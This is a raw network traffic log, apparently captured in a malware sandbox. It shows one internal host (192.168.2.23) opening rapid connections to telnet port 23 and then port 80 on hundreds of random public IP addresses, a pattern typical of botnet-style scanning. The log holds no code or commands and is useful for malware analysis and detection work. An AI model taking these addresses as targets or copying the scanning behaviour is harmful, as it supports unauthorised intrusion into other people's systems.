                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.23163.76.83.235
                                                Dec 3, 2024 22:16:52.553095102 CET3796323192.168.2.2318.228.192.174
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.23165.39.19.62
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.23147.72.154.124
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.23110.186.175.241
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.2384.125.145.100
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.2359.238.200.113
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.238.72.51.136
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.23115.77.111.203
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.2382.149.127.213
                                                Dec 3, 2024 22:16:52.553096056 CET3796323192.168.2.23197.148.179.45
                                                Dec 3, 2024 22:16:52.553101063 CET3796323192.168.2.23132.205.19.6
                                                Dec 3, 2024 22:16:52.553101063 CET3796323192.168.2.23219.250.154.148
                                                Dec 3, 2024 22:16:52.553101063 CET3796323192.168.2.23196.74.162.0
                                                Dec 3, 2024 22:16:52.553101063 CET3796323192.168.2.23123.43.217.202
                                                Dec 3, 2024 22:16:52.553101063 CET3796323192.168.2.23204.95.44.76
                                                Dec 3, 2024 22:16:52.553101063 CET3796323192.168.2.23133.134.239.141
                                                Dec 3, 2024 22:16:52.553101063 CET3796323192.168.2.2385.128.242.36
                                                Dec 3, 2024 22:16:52.553101063 CET3796323192.168.2.2361.136.216.211
                                                Dec 3, 2024 22:16:52.553105116 CET3796323192.168.2.2363.113.222.210
                                                Dec 3, 2024 22:16:52.553105116 CET3796323192.168.2.2320.130.182.206
                                                Dec 3, 2024 22:16:52.553105116 CET3796323192.168.2.23156.248.224.200
                                                Dec 3, 2024 22:16:52.553105116 CET3796323192.168.2.23113.62.17.160
                                                Dec 3, 2024 22:16:52.553105116 CET3796323192.168.2.2352.225.77.58
                                                Dec 3, 2024 22:16:52.553105116 CET3796323192.168.2.2392.4.143.101
                                                Dec 3, 2024 22:16:52.553105116 CET3796323192.168.2.2341.168.179.55
                                                Dec 3, 2024 22:16:52.553105116 CET3796323192.168.2.2323.116.195.39
                                                Dec 3, 2024 22:16:52.553107977 CET3796323192.168.2.23211.161.28.245
                                                Dec 3, 2024 22:16:52.553108931 CET3796323192.168.2.23162.174.246.12
                                                Dec 3, 2024 22:16:52.553108931 CET3796323192.168.2.23188.235.86.229
                                                Dec 3, 2024 22:16:52.553107977 CET3796323192.168.2.2358.82.12.241
                                                Dec 3, 2024 22:16:52.553108931 CET3796323192.168.2.2368.144.167.70
                                                Dec 3, 2024 22:16:52.553107977 CET3796323192.168.2.2360.196.97.43
                                                Dec 3, 2024 22:16:52.553108931 CET3796323192.168.2.23189.102.204.52
                                                Dec 3, 2024 22:16:52.553107977 CET3796323192.168.2.231.87.194.41
                                                Dec 3, 2024 22:16:52.553108931 CET3796323192.168.2.23144.100.24.136
                                                Dec 3, 2024 22:16:52.553107977 CET3796323192.168.2.2363.235.208.124
                                                Dec 3, 2024 22:16:52.553108931 CET3796323192.168.2.2362.5.200.164
                                                Dec 3, 2024 22:16:52.553107977 CET3796323192.168.2.2368.221.243.246
                                                Dec 3, 2024 22:16:52.553108931 CET3796323192.168.2.2377.88.18.89
                                                Dec 3, 2024 22:16:52.553107977 CET3796323192.168.2.2395.11.26.133
                                                Dec 3, 2024 22:16:52.553108931 CET3796323192.168.2.23137.80.221.73
                                                Dec 3, 2024 22:16:52.553107977 CET3796323192.168.2.23183.16.231.163
                                                Dec 3, 2024 22:16:52.553123951 CET3796323192.168.2.23153.54.213.55
                                                Dec 3, 2024 22:16:52.553123951 CET3796323192.168.2.2352.144.202.248
                                                Dec 3, 2024 22:16:52.553123951 CET3796323192.168.2.23134.215.115.49
                                                Dec 3, 2024 22:16:52.553124905 CET3796323192.168.2.23128.140.149.196
                                                Dec 3, 2024 22:16:52.553123951 CET3796323192.168.2.232.231.226.67
                                                Dec 3, 2024 22:16:52.553124905 CET3796323192.168.2.23133.206.45.13
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23123.105.248.0
                                                Dec 3, 2024 22:16:52.553123951 CET3796323192.168.2.2379.65.163.48
                                                Dec 3, 2024 22:16:52.553124905 CET3796323192.168.2.23130.135.69.249
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.2373.56.33.93
                                                Dec 3, 2024 22:16:52.553124905 CET3796323192.168.2.23130.249.217.249
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23112.17.14.71
                                                Dec 3, 2024 22:16:52.553123951 CET3796323192.168.2.2386.250.168.180
                                                Dec 3, 2024 22:16:52.553124905 CET3796323192.168.2.23208.45.30.16
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.2345.141.224.230
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23144.80.204.31
                                                Dec 3, 2024 22:16:52.553123951 CET3796323192.168.2.2390.47.35.135
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23186.37.43.197
                                                Dec 3, 2024 22:16:52.553123951 CET3796323192.168.2.23165.100.133.49
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23110.50.39.35
                                                Dec 3, 2024 22:16:52.553124905 CET3796323192.168.2.23117.233.69.38
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23123.22.3.248
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.2332.211.167.240
                                                Dec 3, 2024 22:16:52.553124905 CET3796323192.168.2.23162.47.109.180
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23212.140.248.24
                                                Dec 3, 2024 22:16:52.553124905 CET3796323192.168.2.2391.8.24.129
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23222.131.247.197
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23114.134.226.165
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23222.33.4.206
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23165.138.110.224
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23158.205.236.17
                                                Dec 3, 2024 22:16:52.553126097 CET3796323192.168.2.23188.147.102.119
                                                Dec 3, 2024 22:16:52.553138971 CET3796323192.168.2.2397.76.231.198
                                                Dec 3, 2024 22:16:52.553138971 CET3796323192.168.2.2312.147.227.125
                                                Dec 3, 2024 22:16:52.553139925 CET3796323192.168.2.2357.178.114.185
                                                Dec 3, 2024 22:16:52.553139925 CET3796323192.168.2.23123.127.115.210
                                                Dec 3, 2024 22:16:52.553139925 CET3796323192.168.2.2373.219.161.167
                                                Dec 3, 2024 22:16:52.553139925 CET3796323192.168.2.23135.20.32.26
                                                Dec 3, 2024 22:16:52.553139925 CET3796323192.168.2.2351.27.226.40
                                                Dec 3, 2024 22:16:52.553139925 CET3796323192.168.2.23102.41.181.140
                                                Dec 3, 2024 22:16:52.553141117 CET3796323192.168.2.23149.137.147.69
                                                Dec 3, 2024 22:16:52.553141117 CET3796323192.168.2.2380.152.3.78
                                                Dec 3, 2024 22:16:52.553141117 CET3796323192.168.2.2370.36.123.164
                                                Dec 3, 2024 22:16:52.553141117 CET3796323192.168.2.238.7.117.255
                                                Dec 3, 2024 22:16:52.553141117 CET3796323192.168.2.23119.245.150.166
                                                Dec 3, 2024 22:16:52.553141117 CET3796323192.168.2.2360.75.44.215
                                                Dec 3, 2024 22:16:52.553142071 CET3796323192.168.2.2393.12.134.170
                                                Dec 3, 2024 22:16:52.553142071 CET3796323192.168.2.23201.203.225.154
                                                Dec 3, 2024 22:16:52.553143024 CET3796323192.168.2.23132.119.32.144
                                                Dec 3, 2024 22:16:52.553143024 CET3796323192.168.2.23217.9.123.106
                                                Dec 3, 2024 22:16:52.553143024 CET3796323192.168.2.2369.255.63.191
                                                Dec 3, 2024 22:16:52.553143024 CET3796323192.168.2.23161.93.192.123
                                                Dec 3, 2024 22:16:52.553143024 CET3796323192.168.2.2336.152.80.20
                                                Dec 3, 2024 22:16:52.553143024 CET3796323192.168.2.231.28.7.200
                                                Dec 3, 2024 22:16:52.553143024 CET3796323192.168.2.23219.61.199.143
                                                Dec 3, 2024 22:16:52.553143024 CET3796323192.168.2.23111.112.26.40
                                                Dec 3, 2024 22:16:52.553144932 CET3796323192.168.2.23187.78.150.23
                                                Dec 3, 2024 22:16:52.553144932 CET3796323192.168.2.23170.242.213.12
                                                Dec 3, 2024 22:16:52.553144932 CET3796323192.168.2.2352.129.252.1
                                                Dec 3, 2024 22:16:52.553144932 CET3796323192.168.2.2354.146.191.106
                                                Dec 3, 2024 22:16:52.553144932 CET3796323192.168.2.2336.108.213.32
                                                Dec 3, 2024 22:16:52.553144932 CET3796323192.168.2.23205.165.146.24
                                                Dec 3, 2024 22:16:52.553147078 CET3796323192.168.2.2338.47.8.244
                                                Dec 3, 2024 22:16:52.553144932 CET3796323192.168.2.23176.82.215.112
                                                Dec 3, 2024 22:16:52.553147078 CET3796323192.168.2.2393.143.11.156
                                                Dec 3, 2024 22:16:52.553144932 CET3796323192.168.2.23217.160.68.37
                                                Dec 3, 2024 22:16:52.553147078 CET3796323192.168.2.23112.215.106.227
                                                Dec 3, 2024 22:16:52.553148985 CET3796323192.168.2.2317.161.97.74
                                                Dec 3, 2024 22:16:52.553150892 CET3796323192.168.2.23200.224.35.41
                                                Dec 3, 2024 22:16:52.553148985 CET3796323192.168.2.23126.77.229.71
                                                Dec 3, 2024 22:16:52.553150892 CET3796323192.168.2.2390.247.223.126
                                                Dec 3, 2024 22:16:52.553147078 CET3796323192.168.2.2368.200.213.51
                                                Dec 3, 2024 22:16:52.553148985 CET3796323192.168.2.23186.209.25.254
                                                Dec 3, 2024 22:16:52.553150892 CET3796323192.168.2.23123.139.180.161
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.2397.251.139.186
                                                Dec 3, 2024 22:16:52.553160906 CET3796323192.168.2.2399.19.203.104
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.2362.53.34.122
                                                Dec 3, 2024 22:16:52.553160906 CET3796323192.168.2.23131.167.84.187
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.2371.113.78.173
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23167.39.53.203
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23187.149.166.61
                                                Dec 3, 2024 22:16:52.553160906 CET3796323192.168.2.23143.245.10.193
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23219.98.73.40
                                                Dec 3, 2024 22:16:52.553147078 CET3796323192.168.2.2397.109.11.146
                                                Dec 3, 2024 22:16:52.553158998 CET3796323192.168.2.2351.20.116.153
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23185.201.56.153
                                                Dec 3, 2024 22:16:52.553158998 CET3796323192.168.2.23107.235.71.215
                                                Dec 3, 2024 22:16:52.553147078 CET3796323192.168.2.23213.9.218.27
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.2386.61.36.162
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23208.22.62.225
                                                Dec 3, 2024 22:16:52.553160906 CET3796323192.168.2.23184.76.63.90
                                                Dec 3, 2024 22:16:52.553158998 CET3796323192.168.2.2324.162.5.120
                                                Dec 3, 2024 22:16:52.553167105 CET3796323192.168.2.2390.203.134.122
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.2389.223.69.76
                                                Dec 3, 2024 22:16:52.553147078 CET3796323192.168.2.23200.201.15.65
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23158.96.142.2
                                                Dec 3, 2024 22:16:52.553150892 CET3796323192.168.2.23189.123.136.185
                                                Dec 3, 2024 22:16:52.553158998 CET3796323192.168.2.2385.207.35.8
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23132.84.24.46
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23125.85.151.181
                                                Dec 3, 2024 22:16:52.553181887 CET3796323192.168.2.2375.213.52.197
                                                Dec 3, 2024 22:16:52.553150892 CET3796323192.168.2.23128.161.178.1
                                                Dec 3, 2024 22:16:52.553160906 CET3796323192.168.2.23181.237.246.191
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23172.98.29.174
                                                Dec 3, 2024 22:16:52.553160906 CET3796323192.168.2.23170.5.178.144
                                                Dec 3, 2024 22:16:52.553147078 CET3796323192.168.2.23217.167.92.223
                                                Dec 3, 2024 22:16:52.553159952 CET3796323192.168.2.23198.249.112.28
                                                Dec 3, 2024 22:16:52.553168058 CET3796323192.168.2.23126.109.207.44
                                                Dec 3, 2024 22:16:52.553195000 CET3796323192.168.2.2346.238.185.188
                                                Dec 3, 2024 22:16:52.553159952 CET3796323192.168.2.23108.2.189.179
                                                Dec 3, 2024 22:16:52.553195000 CET3796323192.168.2.2337.26.112.117
                                                Dec 3, 2024 22:16:52.553199053 CET3796323192.168.2.2376.168.134.241
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.2353.146.200.78
                                                Dec 3, 2024 22:16:52.553150892 CET3796323192.168.2.234.184.157.225
                                                Dec 3, 2024 22:16:52.553195000 CET3796323192.168.2.2343.253.15.90
                                                Dec 3, 2024 22:16:52.553168058 CET3796323192.168.2.23219.229.90.22
                                                Dec 3, 2024 22:16:52.553195000 CET3796323192.168.2.23157.227.211.168
                                                Dec 3, 2024 22:16:52.553160906 CET3796323192.168.2.2363.97.30.57
                                                Dec 3, 2024 22:16:52.553199053 CET3796323192.168.2.23211.56.158.153
                                                Dec 3, 2024 22:16:52.553160906 CET3796323192.168.2.2369.67.220.57
                                                Dec 3, 2024 22:16:52.553195000 CET3796323192.168.2.2312.28.117.52
                                                Dec 3, 2024 22:16:52.553155899 CET3796323192.168.2.23121.180.70.222
                                                Dec 3, 2024 22:16:52.553159952 CET3796323192.168.2.232.165.2.178
                                                Dec 3, 2024 22:16:52.553168058 CET3796323192.168.2.23157.174.111.121
                                                Dec 3, 2024 22:16:52.553199053 CET3796323192.168.2.23223.251.167.179
                                                Dec 3, 2024 22:16:52.553168058 CET3796323192.168.2.23216.228.103.233
                                                Dec 3, 2024 22:16:52.553199053 CET3796323192.168.2.234.159.56.226
                                                Dec 3, 2024 22:16:52.553159952 CET3796323192.168.2.23189.166.21.209
                                                Dec 3, 2024 22:16:52.553168058 CET3796323192.168.2.23149.68.26.74
                                                Dec 3, 2024 22:16:52.553214073 CET3796323192.168.2.23117.230.90.224
                                                Dec 3, 2024 22:16:52.553199053 CET3796323192.168.2.2313.126.184.205
                                                Dec 3, 2024 22:16:52.553214073 CET3796323192.168.2.23100.220.206.184
                                                Dec 3, 2024 22:16:52.553199053 CET3796323192.168.2.23117.20.82.250
                                                Dec 3, 2024 22:16:52.553168058 CET3796323192.168.2.23202.141.250.196
                                                Dec 3, 2024 22:16:52.553217888 CET3796323192.168.2.2317.77.113.208
                                                Dec 3, 2024 22:16:52.553168058 CET3796323192.168.2.23165.153.41.96
                                                Dec 3, 2024 22:16:52.553217888 CET3796323192.168.2.23195.254.199.130
                                                Dec 3, 2024 22:16:52.553214073 CET3796323192.168.2.23129.198.66.119
                                                Dec 3, 2024 22:16:52.553199053 CET3796323192.168.2.23143.208.150.243
                                                Dec 3, 2024 22:16:52.553217888 CET3796323192.168.2.23208.216.79.198
                                                Dec 3, 2024 22:16:52.553168058 CET3796323192.168.2.2318.94.153.51
                                                Dec 3, 2024 22:16:52.553217888 CET3796323192.168.2.23184.144.204.12
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.23212.82.192.29
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.23192.248.104.68
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.23156.209.203.9
                                                Dec 3, 2024 22:16:52.553217888 CET3796323192.168.2.23194.127.217.133
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.23204.9.62.211
                                                Dec 3, 2024 22:16:52.553225994 CET3796323192.168.2.234.119.116.70
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.23148.119.100.160
                                                Dec 3, 2024 22:16:52.553199053 CET3796323192.168.2.239.161.218.167
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.2388.206.209.218
                                                Dec 3, 2024 22:16:52.553217888 CET3796323192.168.2.2376.139.221.4
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.23105.11.190.254
                                                Dec 3, 2024 22:16:52.553225994 CET3796323192.168.2.2347.148.71.154
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.23192.138.197.186
                                                Dec 3, 2024 22:16:52.553225994 CET3796323192.168.2.2353.206.184.173
                                                Dec 3, 2024 22:16:52.553220034 CET3796323192.168.2.23179.119.85.248
                                                Dec 3, 2024 22:16:52.553225994 CET3796323192.168.2.2373.19.78.103
                                                Dec 3, 2024 22:16:52.553225994 CET3796323192.168.2.23177.48.234.224
                                                Dec 3, 2024 22:16:52.553225994 CET3796323192.168.2.2386.106.201.111
                                                Dec 3, 2024 22:16:52.553225994 CET3796323192.168.2.2389.254.30.168
                                                Dec 3, 2024 22:16:52.553225994 CET3796323192.168.2.23102.77.120.140
                                                Dec 3, 2024 22:16:52.553235054 CET3796323192.168.2.23165.255.238.233
                                                Dec 3, 2024 22:16:52.553236961 CET3796323192.168.2.23199.33.211.174
                                                Dec 3, 2024 22:16:52.553240061 CET3796323192.168.2.23173.109.228.35
                                                Dec 3, 2024 22:16:52.553240061 CET3796323192.168.2.2337.226.179.168
                                                Dec 3, 2024 22:16:52.553240061 CET3796323192.168.2.23130.178.119.51
                                                Dec 3, 2024 22:16:52.553240061 CET3796323192.168.2.23143.140.251.82
                                                Dec 3, 2024 22:16:52.553241014 CET3796323192.168.2.23138.115.14.147
                                                Dec 3, 2024 22:16:52.553241014 CET3796323192.168.2.23104.177.46.59
                                                Dec 3, 2024 22:16:52.553241014 CET3796323192.168.2.2332.166.127.247
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.2385.79.130.152
                                                Dec 3, 2024 22:16:52.553241014 CET3796323192.168.2.23121.148.181.147
                                                Dec 3, 2024 22:16:52.553242922 CET3796323192.168.2.23133.240.204.207
                                                Dec 3, 2024 22:16:52.553241014 CET3796323192.168.2.23105.28.1.101
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.23105.75.78.128
                                                Dec 3, 2024 22:16:52.553242922 CET3796323192.168.2.23176.170.47.235
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.23116.240.105.141
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.23118.153.64.82
                                                Dec 3, 2024 22:16:52.553246021 CET3796323192.168.2.23169.105.194.1
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.23120.55.193.211
                                                Dec 3, 2024 22:16:52.553250074 CET3796323192.168.2.23109.128.247.178
                                                Dec 3, 2024 22:16:52.553251028 CET3796323192.168.2.23199.153.137.194
                                                Dec 3, 2024 22:16:52.553250074 CET3796323192.168.2.2367.18.104.167
                                                Dec 3, 2024 22:16:52.553252935 CET3796323192.168.2.2399.216.75.196
                                                Dec 3, 2024 22:16:52.553251028 CET3796323192.168.2.2395.201.69.76
                                                Dec 3, 2024 22:16:52.553242922 CET3796323192.168.2.2361.56.99.56
                                                Dec 3, 2024 22:16:52.553246021 CET3796323192.168.2.2378.158.165.19
                                                Dec 3, 2024 22:16:52.553251028 CET3796323192.168.2.2327.6.12.25
                                                Dec 3, 2024 22:16:52.553250074 CET3796323192.168.2.2349.182.235.86
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.2354.9.213.134
                                                Dec 3, 2024 22:16:52.553251028 CET3796323192.168.2.23175.234.198.77
                                                Dec 3, 2024 22:16:52.553242922 CET3796323192.168.2.23213.87.131.171
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.2377.79.201.130
                                                Dec 3, 2024 22:16:52.553250074 CET3796323192.168.2.2318.230.67.71
                                                Dec 3, 2024 22:16:52.553246021 CET3796323192.168.2.23193.19.108.86
                                                Dec 3, 2024 22:16:52.553251028 CET3796323192.168.2.23151.242.20.23
                                                Dec 3, 2024 22:16:52.553242922 CET3796323192.168.2.23159.83.251.126
                                                Dec 3, 2024 22:16:52.553251028 CET3796323192.168.2.23220.202.129.112
                                                Dec 3, 2024 22:16:52.553242922 CET3796323192.168.2.23141.228.135.40
                                                Dec 3, 2024 22:16:52.553261042 CET3796323192.168.2.2360.240.180.12
                                                Dec 3, 2024 22:16:52.553242922 CET3796323192.168.2.2380.205.186.127
                                                Dec 3, 2024 22:16:52.553256035 CET3796323192.168.2.23183.97.115.213
                                                Dec 3, 2024 22:16:52.553251028 CET3796323192.168.2.231.82.116.245
                                                Dec 3, 2024 22:16:52.553246021 CET3796323192.168.2.23100.185.86.107
                                                Dec 3, 2024 22:16:52.553256989 CET3796323192.168.2.23108.20.169.4
                                                Dec 3, 2024 22:16:52.553246021 CET3796323192.168.2.2381.151.43.162
                                                Dec 3, 2024 22:16:52.553242922 CET3796323192.168.2.2366.174.138.26
                                                Dec 3, 2024 22:16:52.553246021 CET3796323192.168.2.2374.87.48.225
                                                Dec 3, 2024 22:16:52.553256989 CET3796323192.168.2.2350.184.176.47
                                                Dec 3, 2024 22:16:52.553251028 CET3796323192.168.2.23119.149.185.164
                                                Dec 3, 2024 22:16:52.553246021 CET3796323192.168.2.23136.68.110.107
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.23184.250.19.140
                                                Dec 3, 2024 22:16:52.553246021 CET3796323192.168.2.2370.102.29.10
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.23191.23.176.167
                                                Dec 3, 2024 22:16:52.553241968 CET3796323192.168.2.23157.162.158.203
                                                Dec 3, 2024 22:16:52.553282022 CET3796323192.168.2.2359.18.154.84
                                                Dec 3, 2024 22:16:52.553282022 CET3796323192.168.2.2346.190.33.56
                                                Dec 3, 2024 22:16:52.553282022 CET3796323192.168.2.2337.176.2.145
                                                Dec 3, 2024 22:16:52.553282022 CET3796323192.168.2.23175.77.152.24
                                                Dec 3, 2024 22:16:52.553282022 CET3796323192.168.2.23125.166.97.125
                                                Dec 3, 2024 22:16:52.553282022 CET3796323192.168.2.23172.74.188.183
                                                Dec 3, 2024 22:16:52.553282022 CET3796323192.168.2.232.215.119.6
                                                Dec 3, 2024 22:16:52.553282022 CET3796323192.168.2.23103.59.176.42
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.23166.211.9.140
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.23154.91.77.155
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.23181.129.171.214
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.23223.41.105.64
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.23195.234.121.177
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.23100.206.149.11
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.23155.153.47.226
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.2377.199.61.182
                                                Dec 3, 2024 22:16:52.553284883 CET3796323192.168.2.2399.124.138.178
                                                Dec 3, 2024 22:16:52.553292036 CET3796323192.168.2.23131.14.238.188
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.2344.133.113.186
                                                Dec 3, 2024 22:16:52.553292036 CET3796323192.168.2.23222.21.73.125
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.23175.99.42.143
                                                Dec 3, 2024 22:16:52.553292036 CET3796323192.168.2.23169.74.52.87
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.2378.232.29.189
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.2373.45.201.53
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.23191.3.91.243
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.23141.125.203.180
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.23198.118.21.133
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.2314.5.232.23
                                                Dec 3, 2024 22:16:52.553294897 CET3796323192.168.2.2354.154.235.58
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.23217.212.62.216
                                                Dec 3, 2024 22:16:52.553294897 CET3796323192.168.2.234.145.54.94
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.23210.203.81.115
                                                Dec 3, 2024 22:16:52.553294897 CET3796323192.168.2.2340.31.113.248
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.23200.48.176.38
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.23155.29.211.165
                                                Dec 3, 2024 22:16:52.553296089 CET3796323192.168.2.23223.182.78.149
                                                Dec 3, 2024 22:16:52.553292990 CET3796323192.168.2.2360.121.198.120
                                                Dec 3, 2024 22:16:52.553296089 CET3796323192.168.2.2394.255.70.130
                                                Dec 3, 2024 22:16:52.553296089 CET3796323192.168.2.2385.226.253.4
                                                Dec 3, 2024 22:16:52.553296089 CET3796323192.168.2.23161.143.185.37
                                                Dec 3, 2024 22:16:52.553296089 CET3796323192.168.2.23104.60.102.158
                                                Dec 3, 2024 22:16:52.553313017 CET3796323192.168.2.23189.107.162.219
                                                Dec 3, 2024 22:16:52.553313017 CET3796323192.168.2.2340.228.219.234
                                                Dec 3, 2024 22:16:52.553313017 CET3796323192.168.2.2388.194.242.117
                                                Dec 3, 2024 22:16:52.553318977 CET3796323192.168.2.23179.79.118.198
                                                Dec 3, 2024 22:16:52.553318977 CET3796323192.168.2.2361.208.244.168
                                                Dec 3, 2024 22:16:52.553318977 CET3796323192.168.2.2383.88.142.17
                                                Dec 3, 2024 22:16:52.553318977 CET3796323192.168.2.2325.31.222.22
                                                Dec 3, 2024 22:16:52.553318977 CET3796323192.168.2.23168.74.88.210
                                                Dec 3, 2024 22:16:52.553318977 CET3796323192.168.2.2331.158.157.108
                                                Dec 3, 2024 22:16:52.553318977 CET3796323192.168.2.23197.90.135.16
                                                Dec 3, 2024 22:16:52.553318977 CET3796323192.168.2.2377.73.167.75
                                                Dec 3, 2024 22:16:52.553332090 CET3796323192.168.2.23105.221.16.179
                                                Dec 3, 2024 22:16:52.553332090 CET3796323192.168.2.2382.2.70.100
                                                Dec 3, 2024 22:16:52.553332090 CET3796323192.168.2.2360.37.252.238
                                                Dec 3, 2024 22:16:52.553332090 CET3796323192.168.2.23140.79.10.90
                                                Dec 3, 2024 22:16:52.553332090 CET3796323192.168.2.23208.239.214.45
                                                Dec 3, 2024 22:16:52.553332090 CET3796323192.168.2.23195.255.127.124
                                                Dec 3, 2024 22:16:52.553332090 CET3796323192.168.2.23172.198.73.185
                                                Dec 3, 2024 22:16:52.553332090 CET3796323192.168.2.23200.159.71.193
                                                Dec 3, 2024 22:16:52.553343058 CET3796323192.168.2.23219.64.197.170
                                                Dec 3, 2024 22:16:52.553343058 CET3796323192.168.2.2327.76.189.243
                                                Dec 3, 2024 22:16:52.553343058 CET3796323192.168.2.23144.131.208.174
                                                Dec 3, 2024 22:16:52.563499928 CET3525280192.168.2.23210.36.162.136
                                                Dec 3, 2024 22:16:52.563502073 CET4251680192.168.2.23109.202.202.202
                                                Dec 3, 2024 22:16:52.563504934 CET3768480192.168.2.231.252.247.68
                                                Dec 3, 2024 22:16:52.563507080 CET3499680192.168.2.2364.69.46.207
                                                Dec 3, 2024 22:16:52.563507080 CET6070480192.168.2.2399.212.18.166
                                                Dec 3, 2024 22:16:52.563519001 CET4536280192.168.2.2323.93.194.133
                                                Dec 3, 2024 22:16:52.563519955 CET5470880192.168.2.23221.128.53.64
                                                Dec 3, 2024 22:16:52.563524961 CET3310680192.168.2.23157.8.141.192
                                                Dec 3, 2024 22:16:52.563524961 CET3402680192.168.2.23125.111.75.105
                                                Dec 3, 2024 22:16:52.563530922 CET5501880192.168.2.23111.211.175.160
                                                Dec 3, 2024 22:16:52.563536882 CET4557280192.168.2.23157.200.164.96
                                                Dec 3, 2024 22:16:52.563543081 CET5042680192.168.2.23110.174.211.110
                                                Dec 3, 2024 22:16:52.595588923 CET5225680192.168.2.23110.23.29.220
                                                Dec 3, 2024 22:16:52.595588923 CET4957680192.168.2.23107.229.45.191
                                                Dec 3, 2024 22:16:52.595588923 CET5270480192.168.2.23182.205.184.220
                                                Dec 3, 2024 22:16:52.595591068 CET4855280192.168.2.2354.6.47.124
                                                Dec 3, 2024 22:16:52.595591068 CET5686480192.168.2.23145.20.17.13
                                                Dec 3, 2024 22:16:52.595591068 CET3313280192.168.2.2332.60.240.155
                                                Dec 3, 2024 22:16:52.595591068 CET4011880192.168.2.23149.70.197.245
                                                Dec 3, 2024 22:16:52.595592022 CET4641680192.168.2.2393.104.201.65
                                                Dec 3, 2024 22:16:52.595592022 CET4206080192.168.2.23101.211.231.251
                                                Dec 3, 2024 22:16:52.595592022 CET4501680192.168.2.23186.244.224.1
                                                Dec 3, 2024 22:16:52.595597029 CET4070480192.168.2.23177.102.58.160
                                                Dec 3, 2024 22:16:52.595599890 CET3730080192.168.2.23159.157.188.52
                                                Dec 3, 2024 22:16:52.595604897 CET3704680192.168.2.2383.228.148.68
                                                Dec 3, 2024 22:16:52.595604897 CET5583480192.168.2.23103.104.235.120
                                                Dec 3, 2024 22:16:52.595604897 CET3350880192.168.2.23116.198.57.17
